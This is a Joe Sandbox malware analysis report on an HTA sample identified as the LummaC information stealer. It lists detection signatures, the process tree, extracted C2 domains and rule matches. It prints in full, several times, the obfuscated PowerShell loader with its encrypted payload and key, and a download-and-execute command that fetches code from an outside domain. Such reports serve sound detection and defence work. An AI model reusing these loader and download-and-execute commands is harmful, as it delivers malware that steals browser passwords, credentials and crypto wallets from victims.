Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
re5.mp4.hta

Overview

General Information

Sample name:re5.mp4.hta
Analysis ID:1582681
MD5:5697159735d484d2d4fff3ef06aa6f62
SHA1:98d8b2509628ab131345992f2d43241913d12557
SHA256:3098a9c50afcd478c3eeb9b12b3794109c0f3652263bcaf8b0077c413188e4da
Tags:htaLummaStealeruser-lontze7
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 764 cmdline: mshta.exe "C:\Users\user\Desktop\re5.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 4524 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 616 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3836 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • powershell.exe (PID: 6388 cmdline: powershell -exec bypass MZP MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["appliacnesot.buzz", "scentniej.buzz", "inherineau.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "permissiblene.click"], "Build id": "yJaNLj--re5"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000004.00000002.2856842379.0000000006F90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: powershell.exe PID: 4524JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 4524INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x1219f6:$b1: ::WriteAllBytes(
          • 0x121f19:$b1: ::WriteAllBytes(
          • 0x19ba5:$s1: -join
          • 0x1ab36:$s1: -join
          • 0x1bc47:$s1: -join
          • 0x2531e:$s1: -join
          • 0x31a8f:$s1: -join
          • 0x477a4:$s1: -join
          • 0x47f58:$s1: -join
          • 0x7df1f:$s1: -join
          • 0x7e516:$s1: -join
          • 0x851c3:$s1: -join
          • 0xb4970:$s1: -join
          • 0xb770b:$s1: -join
          • 0xb7cbe:$s1: -join
          • 0xba00d:$s1: -join
          • 0xba770:$s1: -join
          • 0xbbd19:$s1: -join
          • 0xf564e:$s1: -join
          • 0x1187e8:$s1: -join
          • 0x118f4b:$s1: -join
          Process Memory Space: powershell.exe PID: 616JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: powershell.exe PID: 616INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x32af31:$b2: ::FromBase64String(
            • 0x32aeb5:$s1: -join
            • 0x70069a:$s1: -join
            • 0x70d76f:$s1: -join
            • 0x710b41:$s1: -join
            • 0x7111f3:$s1: -join
            • 0x712ce4:$s1: -join
            • 0x714eea:$s1: -join
            • 0x715711:$s1: -join
            • 0x715f81:$s1: -join
            • 0x7166bc:$s1: -join
            • 0x7166ee:$s1: -join
            • 0x716736:$s1: -join
            • 0x716755:$s1: -join
            • 0x716fa5:$s1: -join
            • 0x717121:$s1: -join
            • 0x717199:$s1: -join
            • 0x71722c:$s1: -join
            • 0x717492:$s1: -join
            • 0x719628:$s1: -join
            • 0x728072:$s1: -join
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            4.2.powershell.exe.6f90000.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              SourceRuleDescriptionAuthorStrings
              amsi32_4524.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_616.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4524, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , ProcessId: 616, ProcessName: powershell.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B30
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129), ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4524, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , ProcessId: 616, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass MZP, CommandLine: powershell -exec bypass MZP, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3836, ParentProcessName: powershell.exe, ProcessCommandLine: powershell -exec bypass MZP, ProcessId: 6388, ProcessName: powershell.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B30
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E